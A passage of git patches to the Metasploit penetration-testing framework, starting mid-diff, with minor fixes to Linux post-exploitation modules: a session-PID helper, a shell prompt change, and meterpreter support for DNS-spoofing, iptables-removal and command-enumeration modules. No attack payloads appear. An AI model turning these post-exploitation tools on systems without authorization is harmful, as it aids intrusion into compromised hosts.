a/lib/msf/core/post/linux/system.rb +++ b/lib/msf/core/post/linux/system.rb @@ -207,6 +207,14 @@ def get_shell_pid cmd_exec("echo $$").to_s end + # + # Gets the pid of the current session + # @return [String] + # + def get_session_pid + cmd_exec("echo $PPID").to_s + end + # # Checks if the system has gcc installed # @return [Boolean] diff --git a/lib/msf/core/post/unix.rb b/lib/msf/core/post/unix.rb index b6abc48cfce0..78c10dbe602d 100644 --- a/lib/msf/core/post/unix.rb +++ b/lib/msf/core/post/unix.rb @@ -93,7 +93,7 @@ def enum_user_directories # @return [String] with username # def whoami - shellpid = get_shell_pid() + shellpid = get_session_pid() statuspid = pid_uid(shellpid) statuspid.each_line do |line| split = line.split(":") From 006faa3d177522d9e638a9ffc37817d4732898e6 Mon Sep 17 00:00:00 2001 From: William Vu Date: Thu, 24 Jan 2019 11:13:00 -0600 Subject: [PATCH 20/21] Fix prompt --- modules/post/linux/manage/pseudo_shell.rb | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/modules/post/linux/manage/pseudo_shell.rb b/modules/post/linux/manage/pseudo_shell.rb index 1d5378d70ebe..1b180a0c7d0a 100644 --- a/modules/post/linux/manage/pseudo_shell.rb +++ b/modules/post/linux/manage/pseudo_shell.rb @@ -38,9 +38,6 @@ class MetasploitModule < Msf::Post LIST.insert(-1, linea[0]) end -@vhostname = "" -@vusername = "" - def initialize super( 'Name' => 'Pseudo-Shell Post-Exploitation Module', @@ -57,6 +54,7 @@ def initialize def run @vhostname = get_hostname @vusername = whoami + @vpromptchar = is_root? ? '#' : '$' prompt() end @@ -102,7 +100,7 @@ def help() end def prompt_show() - promptshell = @vusername + "@" + @vhostname + ":" + pwd.strip() + "# " + promptshell = "#{@vusername}@#{@vhostname}:#{pwd.strip}#{@vpromptchar} " comp = proc { |s| LIST.grep(/^#{Regexp.escape(s)}/) } Readline.completion_append_character = " " Readline.completion_proc = comp From 8cdcba81feee58e589835dbf9ea3ade7db248c7d Mon Sep 17 00:00:00 2001 From: William Vu Date: Thu, 24 Jan 2019 11:22:19 -0600 Subject: [PATCH 21/21] Fix SessionTypes --- modules/post/linux/gather/enum_commands.rb | 2 +- modules/post/linux/manage/dns_spoofing.rb | 2 +- modules/post/linux/manage/iptables_removal.rb | 2 +- modules/post/linux/manage/pseudo_shell.rb | 2 +- 4 files changed, 4 insertions(+), 4 deletions(-) diff --git a/modules/post/linux/gather/enum_commands.rb b/modules/post/linux/gather/enum_commands.rb index a5ec03e42b57..b91614c234b4 100644 --- a/modules/post/linux/gather/enum_commands.rb +++ b/modules/post/linux/gather/enum_commands.rb @@ -16,7 +16,7 @@ def initialize 'Author' => 'Alberto Rafael Rodriguez Iglesias ', 'License' => MSF_LICENSE, 'Platform' => ['linux'], - 'SessionTypes' => ['shell'] + 'SessionTypes' => ['shell', 'meterpreter'] ) register_options( [ diff --git a/modules/post/linux/manage/dns_spoofing.rb b/modules/post/linux/manage/dns_spoofing.rb index d518a4a30cee..5731743846ad 100644 --- a/modules/post/linux/manage/dns_spoofing.rb +++ b/modules/post/linux/manage/dns_spoofing.rb @@ -16,7 +16,7 @@ def initialize 'Author' => 'Alberto Rafael Rodriguez Iglesias ', 'License' => MSF_LICENSE, 'Platform' => ['linux'], - 'SessionTypes' => ['shell'] + 'SessionTypes' => ['shell', 'meterpreter'] ) register_options( [ diff --git a/modules/post/linux/manage/iptables_removal.rb b/modules/post/linux/manage/iptables_removal.rb index 56fe26bd5f4a..11ab186502cd 100644 --- a/modules/post/linux/manage/iptables_removal.rb +++ b/modules/post/linux/manage/iptables_removal.rb @@ -16,7 +16,7 @@ def initialize 'Author' => 'Alberto Rafael Rodriguez Iglesias ', 'License' => MSF_LICENSE, 'Platform' => ['linux'], - 'SessionTypes' => ['shell'] + 'SessionTypes' => ['shell', 'meterpreter'] ) end diff --git a/modules/post/linux/manage/pseudo_shell.rb b/modules/post/linux/manage/pseudo_shell.rb index 1b180a0c7d0a..098210bf7719 100644 --- a/modules/post/linux/manage/pseudo_shell.rb +++ b/modules/post/linux/manage/pseudo_shell.rb @@ -47,7 +47,7 @@ def initialize 'Author' => 'Alberto Rafael Rodriguez Iglesias ', 'License' => MSF_LICENSE, 'Platform' => ['linux'], - 'SessionTypes' => ['shell'] + 'SessionTypes' => ['shell', 'meterpreter'] ) end